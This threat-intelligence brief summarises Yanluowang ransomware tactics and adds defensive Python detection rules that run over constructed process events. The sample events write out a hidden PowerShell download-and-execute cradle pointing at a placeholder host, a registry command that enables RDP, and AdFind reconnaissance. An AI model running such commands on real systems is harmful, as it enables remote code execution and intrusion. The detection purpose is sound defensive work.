2021-12-01

Yanluowang Ransomware Linked to Thieflock Affiliate

Level: Tactical | Source: Symantec
Sectors: Consultancy, Engineering, Financial & Manufacturing


The Yanluowang ransomware group, active since at least August 2021, has been targeting US corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group's TTPs closely resemble those seen in Thieflock ransomware attacks. Based on Symantec's observations, there appears to be a link, or a shift in allegiance from Thieflock to the Yanluowang ransomware family. Notable TTPs observed include BazarLoader for initial access, PowerShell to download tools that enable RDP through the registry, AdFind for Active Directory reconnaissance, and various other credential-stealing tools.
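The TTP chain above is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from Symantec or Anvilogic: it runs three rules (PowerShell download cradle, RDP enabled by setting fDenyTSConnections to 0, AdFind query) over constructed Sysmon-style events and escalates only hosts where more than one of these TTPs appears, since each on its own can be routine administration. The host names, paths and URL are placeholders.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not real telemetry);
# host names, paths and the URL are placeholders invented for this example.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/t.ps1'))\""},
    {"host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
                r' /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "WS01", "image": r"C:\Users\jdoe\AppData\Local\Temp\adfind.exe",
     "cmdline": "adfind.exe -f (objectcategory=person) -csv"},
    {"host": "WS02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Reports"},  # benign admin activity
]

# PowerShell download cradles commonly used to pull second-stage tooling.
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
# fDenyTSConnections set to 0 (via reg.exe or Set-ItemProperty) turns RDP on.
RDP_ENABLE = re.compile(r"fDenyTSConnections\b.*?(?:/d\s*0\b|-Value\s*0\b)", re.I)
# AdFind invoked with an LDAP filter (-f) is the classic AD enumeration shape.
ADFIND_QUERY = re.compile(r"\badfind\b.*\s-f\s", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

RULES = {
    "powershell_download_cradle": lambda e: basename(e["image"]) == "powershell.exe"
                                            and DOWNLOAD_CRADLE.search(e["cmdline"]),
    "rdp_enabled_via_registry": lambda e: RDP_ENABLE.search(e["cmdline"]),
    "adfind_recon": lambda e: basename(e["image"]) == "adfind.exe"
                              or ADFIND_QUERY.search(e["cmdline"]),
}

def match_rules(event):
    """Names of every rule the event triggers, in RULES order."""
    return [name for name, pred in RULES.items() if pred(event)]

def triage(events, min_distinct=2):
    """Group hits per host; escalate hosts showing >= min_distinct distinct TTPs,
    because a single cradle, RDP toggle or AD query alone may be routine admin work."""
    hits = defaultdict(set)
    for e in events:
        for name in match_rules(e):
            hits[e["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= min_distinct}
```

Calling `triage(SAMPLE_EVENTS)` escalates WS01 with all three TTPs and leaves WS02, whose only PowerShell use is a directory listing, unflagged.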
